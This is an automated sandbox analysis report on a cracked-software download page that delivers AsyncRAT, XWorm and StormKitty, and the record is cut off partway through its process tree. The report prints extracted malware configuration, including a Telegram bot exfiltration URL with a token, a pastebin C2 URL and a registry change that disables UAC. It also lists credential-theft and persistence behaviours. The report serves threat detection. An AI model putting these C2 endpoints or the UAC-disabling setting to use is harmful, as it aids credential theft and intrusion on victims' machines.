asyncrat | hxxps://crackia[.]com/topic/91908-exm-tweaking-utility-premium-v10-cracked/

Resubmissions

06-12-2024 21:23

241206-z8xkxavjel 10

28-09-2024 23:06

240928-23lbssshng 10

Analysis

max time kernel
146s
max time network
149s
platform
windows11-21h2_x64
resource
win11-20240802-en
resource tags

arch:x64arch:x86image:win11-20240802-enlocale:en-usos:windows11-21h2-x64system
submitted
28-09-2024 23:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://crackia.com/topic/91908-exm-tweaking-utility-premium-v10-cracked/

Score

10^/10

asyncrat stormkitty xworm default discovery evasion execution persistence privilege_escalation rat spyware stealer trojan

Malware Config

Extracted

Family

xworm

Attributes

Install_directory
%LocalAppData%
install_file
USB.exe
pastebin_url
https://pastebin.com/raw/ZnhxAV6a
telegram
https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Extracted

Family

asyncrat

Botnet

Default

127.0.0.1:6606

127.0.0.1:7707

127.0.0.1:8808

https://api.telegram.org/bot7538644364:AAHEMV7mmxz6PSRgzo0ORf3_n0BaazmrAqk/sendMessage?chat_id=7541917888

Mutex

AsyncMutex_6SI8OkPnk

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

Detect Xworm Payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0002000000025af3-496.dat	family_xworm
behavioral1/memory/3316-550-0x0000000000CD0000-0x0000000000CFA000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0002000000025af5-523.dat	family_stormkitty
behavioral1/memory/4432-552-0x0000000000250000-0x000000000028E000-memory.dmp	family_stormkitty

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/files/0x0002000000025af5-523.dat	family_asyncrat

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk	msedge.exe

Executes dropped EXE 4 IoCs

pid	Process
3900	EXMservice.exe
3316	msedge.exe
4432	svchost.exe
3324	msedge.exe

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Drops desktop.ini file(s) 7 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Local\dccc7b2e6bd7e4e58e327adc076b1ca1\Admin@LBPSYPUR_en-US\Grabber\DRIVE-C\Users\Admin\Documents\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\dccc7b2e6bd7e4e58e327adc076b1ca1\Admin@LBPSYPUR_en-US\Grabber\DRIVE-C\Users\Admin\Downloads\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\dccc7b2e6bd7e4e58e327adc076b1ca1\Admin@LBPSYPUR_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Camera Roll\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\dccc7b2e6bd7e4e58e327adc076b1ca1\Admin@LBPSYPUR_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\Saved Pictures\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\dccc7b2e6bd7e4e58e327adc076b1ca1\Admin@LBPSYPUR_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	svchost.exe
File opened for modification	C:\Users\Admin\AppData\Local\dccc7b2e6bd7e4e58e327adc076b1ca1\Admin@LBPSYPUR_en-US\Grabber\DRIVE-C\Users\Admin\Pictures\desktop.ini	svchost.exe
File created	C:\Users\Admin\AppData\Local\dccc7b2e6bd7e4e58e327adc076b1ca1\Admin@LBPSYPUR_en-US\Grabber\DRIVE-C\Users\Admin\Desktop\desktop.ini	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 15 IoCs

Web Service

T1102

flow	ioc
112	pastebin.com
87	pastebin.com
88	pastebin.com
97	pastebin.com
99	pastebin.com
109	pastebin.com
110	pastebin.com
84	pastebin.com
98	pastebin.com
114	pastebin.com
91	pastebin.com
102	pastebin.com
104	pastebin.com
106	pastebin.com
107	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
84	icanhazip.com

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217

Command and Scripting Interpreter: PowerShell 1 TTPs 36 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4424	powershell.exe
3212	powershell.exe
2888	powershell.exe
2516	powershell.exe
3136	powershell.exe
1952	powershell.exe
2088	powershell.exe
1416	powershell.exe
1440	powershell.exe
556	powershell.exe
1008	powershell.exe
1480	powershell.exe
4060	powershell.exe
3880	powershell.exe
1480	powershell.exe
1596	powershell.exe
2592	powershell.exe
4228	powershell.exe
2132	powershell.exe
4824	powershell.exe
1816	powershell.exe
2876	powershell.exe
1008	powershell.exe
684	powershell.exe
3192	powershell.exe
4368	powershell.exe
4916	powershell.exe
2072	powershell.exe
388	powershell.exe
1648	powershell.exe
2108	powershell.exe
1320	powershell.exe
1868	powershell.exe
1252	powershell.exe
3700	powershell.exe
4456	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs

Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key opened	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh	netsh.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	netsh.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5088	cmd.exe
3948	netsh.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	svchost.exe

Delays execution with timeout.exe 32 IoCs

evasion

pid	Process
4024	timeout.exe
5060	timeout.exe
4640	timeout.exe
2664	timeout.exe
4356	timeout.exe
3712	timeout.exe
3596	timeout.exe
4952	timeout.exe
4148	timeout.exe
2148	timeout.exe
3868	timeout.exe
4464	timeout.exe
1060	timeout.exe
3168	timeout.exe
2684	timeout.exe
3416	timeout.exe
1284	timeout.exe
4364	timeout.exe
5012	timeout.exe
1112	timeout.exe
1524	timeout.exe
5060	timeout.exe
776	timeout.exe
1204	timeout.exe
564	timeout.exe
1832	timeout.exe
4140	timeout.exe
5108	timeout.exe
3148	timeout.exe
4356	timeout.exe
3648	timeout.exe
4764	timeout.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 217070.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\EXM_Premium_Tweaking_Utility_1.0_Cracked.bat:Zone.Identifier	msedge.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1176	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2028	msedge.exe
2028	msedge.exe
3460	msedge.exe
3460	msedge.exe
4452	identity_helper.exe
4452	identity_helper.exe
2084	msedge.exe
2084	msedge.exe
1728	msedge.exe
1728	msedge.exe
4060	powershell.exe
4060	powershell.exe
1648	powershell.exe
1648	powershell.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
4432	svchost.exe
1416	powershell.exe
1416	powershell.exe
1252	powershell.exe
1252	powershell.exe
3136	powershell.exe
3136	powershell.exe
1008	powershell.exe
1008	powershell.exe
1596	powershell.exe
1596	powershell.exe
2108	powershell.exe
2108	powershell.exe
1952	powershell.exe
1952	powershell.exe
1440	powershell.exe
1440	powershell.exe
4456	powershell.exe
4456	powershell.exe
3700	powershell.exe
3700	powershell.exe
2592	powershell.exe
2592	powershell.exe
556	powershell.exe
556	powershell.exe
4916	powershell.exe
4916	powershell.exe
4228	powershell.exe
4228	powershell.exe
1480	powershell.exe
1480	powershell.exe
4424	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 14 IoCs

pid	Process
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeIncreaseQuotaPrivilege	3024	WMIC.exe
Token: SeSecurityPrivilege	3024	WMIC.exe
Token: SeTakeOwnershipPrivilege	3024	WMIC.exe
Token: SeLoadDriverPrivilege	3024	WMIC.exe
Token: SeSystemProfilePrivilege	3024	WMIC.exe
Token: SeSystemtimePrivilege	3024	WMIC.exe
Token: SeProfSingleProcessPrivilege	3024	WMIC.exe
Token: SeIncBasePriorityPrivilege	3024	WMIC.exe
Token: SeCreatePagefilePrivilege	3024	WMIC.exe
Token: SeBackupPrivilege	3024	WMIC.exe
Token: SeRestorePrivilege	3024	WMIC.exe
Token: SeShutdownPrivilege	3024	WMIC.exe
Token: SeDebugPrivilege	3024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3024	WMIC.exe
Token: SeRemoteShutdownPrivilege	3024	WMIC.exe
Token: SeUndockPrivilege	3024	WMIC.exe
Token: SeManageVolumePrivilege	3024	WMIC.exe
Token: 33	3024	WMIC.exe
Token: 34	3024	WMIC.exe
Token: 35	3024	WMIC.exe
Token: 36	3024	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3024	WMIC.exe
Token: SeSecurityPrivilege	3024	WMIC.exe
Token: SeTakeOwnershipPrivilege	3024	WMIC.exe
Token: SeLoadDriverPrivilege	3024	WMIC.exe
Token: SeSystemProfilePrivilege	3024	WMIC.exe
Token: SeSystemtimePrivilege	3024	WMIC.exe
Token: SeProfSingleProcessPrivilege	3024	WMIC.exe
Token: SeIncBasePriorityPrivilege	3024	WMIC.exe
Token: SeCreatePagefilePrivilege	3024	WMIC.exe
Token: SeBackupPrivilege	3024	WMIC.exe
Token: SeRestorePrivilege	3024	WMIC.exe
Token: SeShutdownPrivilege	3024	WMIC.exe
Token: SeDebugPrivilege	3024	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3024	WMIC.exe
Token: SeRemoteShutdownPrivilege	3024	WMIC.exe
Token: SeUndockPrivilege	3024	WMIC.exe
Token: SeManageVolumePrivilege	3024	WMIC.exe
Token: 33	3024	WMIC.exe
Token: 34	3024	WMIC.exe
Token: 35	3024	WMIC.exe
Token: 36	3024	WMIC.exe
Token: SeDebugPrivilege	1648	powershell.exe
Token: SeDebugPrivilege	3316	msedge.exe
Token: SeDebugPrivilege	4432	svchost.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	1252	powershell.exe
Token: SeDebugPrivilege	3136	powershell.exe
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	2108	powershell.exe
Token: SeDebugPrivilege	1952	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	4456	powershell.exe
Token: SeDebugPrivilege	3700	powershell.exe
Token: SeDebugPrivilege	2592	powershell.exe
Token: SeDebugPrivilege	556	powershell.exe
Token: SeDebugPrivilege	4916	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	1480	powershell.exe
Token: SeDebugPrivilege	4424	powershell.exe
Token: SeDebugPrivilege	3212	powershell.exe
Token: SeDebugPrivilege	2132	powershell.exe

Suspicious use of FindShellTrayWindow 36 IoCs

pid	Process
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe

Suspicious use of SendNotifyMessage 12 IoCs

pid	Process
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe
3460	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3460 wrote to memory of 2712	3460	msedge.exe	78
PID 3460 wrote to memory of 2712	3460	msedge.exe	78
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 952	3460	msedge.exe	79
PID 3460 wrote to memory of 2028	3460	msedge.exe	80
PID 3460 wrote to memory of 2028	3460	msedge.exe	80
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81
PID 3460 wrote to memory of 4304	3460	msedge.exe	81

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://crackia.com/topic/91908-exm-tweaking-utility-premium-v10-cracked/
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x104,0x108,0x10c,0x100,0x110,0x7ffd4a813cb8,0x7ffd4a813cc8,0x7ffd4a813cd8
  2⤵
  PID:2712
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1916 /prefetch:2
  2⤵
  PID:952
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2028
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2540 /prefetch:8
  2⤵
  PID:4304
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
  2⤵
  PID:2328
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
  2⤵
  PID:2312
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:1
  2⤵
  PID:464
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4972 /prefetch:1
  2⤵
  PID:1728
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4980 /prefetch:1
  2⤵
  PID:3428
- C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5516 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5512 /prefetch:1
  2⤵
  PID:3696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5616 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:2084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5292 /prefetch:1
  2⤵
  PID:672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
  2⤵
  PID:4752
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5948 /prefetch:1
  2⤵
  PID:2016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5964 /prefetch:1
  2⤵
  PID:236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1
  2⤵
  PID:3480
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6192 /prefetch:1
  2⤵
  PID:2136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1892,12639625851887268372,17171717507898806332,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3712 /prefetch:1
  2⤵
  PID:4796
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
